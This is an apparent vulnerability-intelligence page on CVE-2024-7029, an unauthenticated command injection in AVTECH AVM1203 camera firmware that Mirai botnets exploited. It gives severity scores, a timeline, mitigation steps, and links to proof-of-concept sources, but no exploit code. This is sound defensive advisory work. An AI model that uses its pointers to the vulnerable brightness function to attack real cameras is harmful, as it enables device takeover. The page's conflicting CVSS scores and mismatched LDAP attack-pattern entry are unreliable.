Exploit
CVE-2024-7029

Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)

Published: Aug 2, 2024 / Updated: 3mo ago

010
CVSS 8.7EPSS 0.04%High
CVE info copied to clipboard

Summary

Commands can be injected over the network and executed without authentication. This vulnerability is classified as a command injection issue (Improper Neutralization of Special Elements used in a Command). It affects products from the vendor AVTECH, specifically the AVM1203 firmware versions up to and including fullimg-1023-1007-1011-1009.

Impact

This vulnerability has a high severity rating with a CVSS v3.1 base score of 9.8 and a CVSS v4.0 base score of 8.7. The attack vector is network-based, requiring low attack complexity and no privileges, with no user interaction needed. If exploited, it can lead to high impacts on confidentiality, integrity, and availability of the affected system. Attackers could potentially execute arbitrary commands on the target system, leading to unauthorized access, data theft, system modification, or service disruption. The vulnerability allows for command injection over the network without authentication, which could result in complete system compromise.

Exploitation

Multiple proof-of-concept exploits are available on akamai.com, github.com, github.com. Its exploitation has been reported by various sources, including talkback.sh. Malware such as Mirai (Linux) (source:#threatintel) are known to have weaponized this vulnerability.

Patch

The vulnerability data does not provide specific information about available patches. The security team should check with AVTECH for any available security updates or patches addressing this vulnerability, particularly for AVM1203 firmware versions up to and including fullimg-1023-1007-1011-1009.

Mitigation

While awaiting a patch, consider the following mitigation strategies: 1. Implement strong network segmentation to limit access to affected AVTECH devices. 2. Use firewalls or access control lists to restrict network access to these devices, allowing only trusted IP addresses. 3. Monitor logs and network traffic for suspicious command injection attempts. 4. If possible, disable or restrict remote command execution features until a patch is available. 5. Regularly update and patch AVTECH products as soon as security updates become available. 6. Implement the principle of least privilege for all accounts that interact with the affected systems. 7. Consider upgrading AVM1203 firmware to versions newer than fullimg-1023-1007-1011-1009 if available and verified to be unaffected.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Timeline

First Article

Feedly found the first article mentioning CVE-2024-7029. See article

Aug 1, 2024 at 5:09 PM / CISA
CVSS Estimate

Feedly estimated the CVSS score as HIGH

Aug 1, 2024 at 5:13 PM
CVE Assignment

NVD published the first details for CVE-2024-7029

Aug 2, 2024 at 3:16 PM
CVSS

A CVSS base score of 8.8 has been assigned.

Aug 2, 2024 at 3:20 PM / nvd
Exploitation in the Wild

Attacks in the wild have been reported by Talkback News. See article

Aug 2, 2024 at 11:44 PM / Talkback News
EPSS

EPSS Score was set to: 0.04% (Percentile: 9.4%)

Aug 6, 2024 at 11:06 AM
Threat Intelligence Report

CVE-2024-7029 is a critical command injection vulnerability in AVTECH CCTV cameras, allowing for remote code execution. It has been actively exploited by botnets since at least December 2023, with a publicly available proof of concept since 2019. Mitigations and patches are available, but organizations should be vigilant as the vulnerability may impact other third-party vendors using similar technology. See article

Aug 28, 2024 at 5:40 PM
Attribution of Exploits

The vulnerability is known to be exploited by Mirai (Linux). See article

Aug 28, 2024 at 6:20 PM / #threatintel
Trending

This CVE started to trend in security discussions

Aug 29, 2024 at 1:44 PM
Static CVE Timeline Graph

Affected Systems

Avtech/avm1203_firmware
+null more

Exploits

https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt
+null more

Links to Malware Families

Mirai
+null more

Attack Patterns

CAPEC-136: LDAP Injection
+null more

References

New Mirai Variant Exploits Zero-Day in AVTECH Cameras: CVE-2024-7029
On August 28, 2024, the Akamai Security Intelligence and Response Team (SIRT) released a detailed report on a new botnet campaign that exploits a previously undisclosed zero-day vulnerability in AVTECH CCTV cameras. The exploit allows attackers to execute arbitrary commands remotely with elevated privileges, turning the affected cameras into nodes of a rapidly spreading botnet.
Beware the Unpatchable: Corona Mirai Botnet Spreads via Zero-Day
This RCE zero-day vulnerability was discovered in the brightness function of AVTECH IP camera devices and allows for a command injection to spread a Mirai variant on a target system . CVE-2024-7029 (discovered by Aline Eliovich) is a command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE).
Beware the Unpatchable: Corona Mirai Botnet Spreads via Zero-Day
This RCE zero-day vulnerability was discovered in the brightness function of AVTECH IP camera devices and allows for a command injection to spread a Mirai variant on a target system . CVE-2024-7029 (discovered by Aline Eliovich) is a command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE).
See 8 more references

News

Cyble reports surge in cyberattacks targeting critical infrastructure and open-source vulnerabilities
“New to the list are attacks on a vulnerability in the SPIP open-source content management (CMS) and publishing system, while previously reported campaigns targeting vulnerabilities in PHP, Linux systems, Java and Python frameworks, and more have continued unabated.” “As these vulnerabilities likely exist within some critical infrastructure environments, organizations with internet-facing IoT devices and embedded systems are advised to check for risk exposure and apply necessary mitigations,” the Cyble researchers noted in a recent blog post.
Cyberattacks On Spring & IoT Devices
Cyble vulnerability intelligence unit has shared a report, detailing the recent cyberattacks on the Spring Java framework and hundreds of thousands of Internet of Things (IoT) devices. By implementing these recommendations, businesses can enhance their defenses against the active threats identified in Cyble’s vulnerability intelligence report, particularly those targeting the Spring Java framework and IoT devices.
Cyble Sensors Uncover Cyberattacks on Java Framework and IoT Devices
Cyble vulnerability intelligence unit has shared a report, detailing the recent cyberattacks on the Spring Java framework and hundreds of thousands of Internet of Things (IoT) devices. By implementing these recommendations, businesses can enhance their defenses against the active threats identified in Cyble's vulnerability intelligence report, particularly those targeting the Spring Java framework and IoT devices.
Cyble Sensors Detect Attacks on Java Framework, IoT Devices
Cyble’s Vulnerability Intelligence unit also observed thousands of brute-force attacks and hundreds of phishing campaigns. Cyble sensors have detected attacks against other “Ripple20” vulnerabilities during this period—most notably CVE-2020-11900, an IPv4 tunneling Double Free vulnerability also present in the Treck TCP/IP stack before 6.0.1.41—so IoT environments that may contain these vulnerabilities should check for exposures and apply appropriate mitigations.
Cyble Sensors Detect Attacks on Java Framework, IoT Devices
Cyble’s Vulnerability Intelligence unit also observed thousands of brute-force attacks and hundreds of phishing campaigns. Cyble sensors have detected attacks against other “Ripple20” vulnerabilities during this period—most notably CVE-2020-11900, an IPv4 tunneling Double Free vulnerability also present in the Treck TCP/IP stack before 6.0.1.41—so IoT environments that may contain these vulnerabilities should check for exposures and apply appropriate mitigations.
See 124 more articles and social media posts

CVSS V3.1

Attack Vector:Network
Attack Complexity:Low
Privileges Required:None
User Interaction:None
Scope:Unchanged
Confidentiality:High
Integrity:High
Availability Impact:High

Categories

Be the first to know about critical vulnerabilities

Collect, analyze, and share vulnerability reports faster using AI